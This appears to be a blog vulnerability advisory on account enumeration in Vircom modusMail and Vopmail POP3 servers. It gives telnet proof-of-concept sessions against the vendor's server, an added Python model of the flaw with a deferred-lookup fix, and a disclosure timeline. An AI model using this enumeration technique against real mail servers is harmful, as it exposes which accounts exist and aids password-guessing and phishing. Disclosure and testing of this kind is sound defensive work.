Just Another Hacker

Vircom vopmail / modusmail information disclosure

modusMail All in one email security solution

The modusMail™ mail server provides all-in-one email services, messaging security and spam protection. [ Taken from: http://www.vircom.com/en/products/modusmail/ ]

Vulnerability description

A conditional information disclosure exists in older versions of modusMail and Vopmail that reveals whether an email account exists. The disclosure is conditional upon the presence of an @ or % character in the username, a form usually used when one mail system is responsible for the email of several domains. When the username contains one of these characters, the POP3 server aborts the login attempt as soon as it receives the user portion of the login. If the @ or % character is not present in the username, the POP3 server requests a password before rejecting the login.

  • Discovered by: Eldar “Wireghoul” Marcussen
  • Vendor: Vircom - http://www.vircom.com
  • Affected versions:
      • Modus mail <= 4.4.491
      • Probably all versions of Vopmail

Proof of Concept

    ~$ telnet pop.vircom.com 110
    Trying 64.18.73.12...
    Connected to gate.vircom.com.
    Escape character is '^]'.
    +OK modusMail POP3 Server 4.4.491.0 Ready <37819600.1156428713.245@vircom.com>
    user nosuchuserhere
    +OK nosuchuserhere is welcome here
    quit
    +OK vircom.com POP3 server signing off (mailbox empty)
    Connection closed by foreign host.

    ~$ telnet pop.vircom.com 110
    Trying 64.18.73.12...
    Connected to gate.vircom.com.
    Escape character is '^]'.
    +OK modusMail POP3 Server 4.4.491.0 Ready <36899224.1156429893.504@vircom.com>
    user nosuchuser@nosuchhost.com
    -ERR nosuchuser@nosuchhost.com not known
    user nosuchuser%nosuchhost.com
    -ERR nosuchuser%nosuchhost.com not known
    quit
    +OK vircom.com POP3 server signing off (mailbox empty)
    Connection closed by foreign host.
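
The behaviour in the two sessions above, modelled as an added example (not Vircom's code and not part of the original advisory): with defer_lookup off, a username containing @ or % is looked up at USER time, and with it on, every USER gets +OK and rejection waits for PASS. The account table, the PASS reply strings and the names Pop3Auth, defer_lookup and user_stage_oracle are assumptions made for the illustration.

```python
import hmac

# Constructed sample account; example.com is a placeholder, not from the advisory.
ACCOUNTS = {"alice@example.com": "s3cret"}


class Pop3Auth:
    """Model of the USER/PASS exchange; reply texts for PASS are assumptions."""

    def __init__(self, defer_lookup):
        self.defer_lookup = defer_lookup  # False: behaviour in the transcript
        self.user = None

    def user_cmd(self, name):
        key = name.replace("%", "@", 1)  # '%' accepted as a domain separator
        if not self.defer_lookup and "@" in key and key not in ACCOUNTS:
            return f"-ERR {name} not known"  # early reject: account oracle
        self.user = key
        return f"+OK {name} is welcome here"

    def pass_cmd(self, password):
        expected = ACCOUNTS.get(self.user or "")
        # Unknown users are compared against a dummy so both paths do a compare.
        same = hmac.compare_digest((expected or "\0").encode(), password.encode())
        self.user = None
        if expected is not None and same:
            return "+OK mailbox ready"
        return "-ERR authentication failed"  # same reply for bad user or password


def user_stage_oracle(defer_lookup, known, unknown):
    """True if the USER reply status alone separates known from unknown."""
    def status(name):
        return Pop3Auth(defer_lookup).user_cmd(name).split()[0]
    return status(known) != status(unknown)


if __name__ == "__main__":
    for defer in (False, True):
        leak = user_stage_oracle(defer, "alice@example.com", "bob@example.com")
        print(f"defer_lookup={defer}: USER stage leaks account existence: {leak}")
```

A regression test for a mail server can use the same comparison: the USER reply status must be identical for a provisioned and an unprovisioned qualified name.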

Solution

Upgrade to a more recent version

Disclosure time line

  • 06-Nov-2009 - Public disclosure
  • 15-Sep-2006 - New version of modusMail mitigates this
  • 20-Aug-2006 - Vendor acknowledges vulnerability
  • 19-Aug-2006 - Vendor notified through email
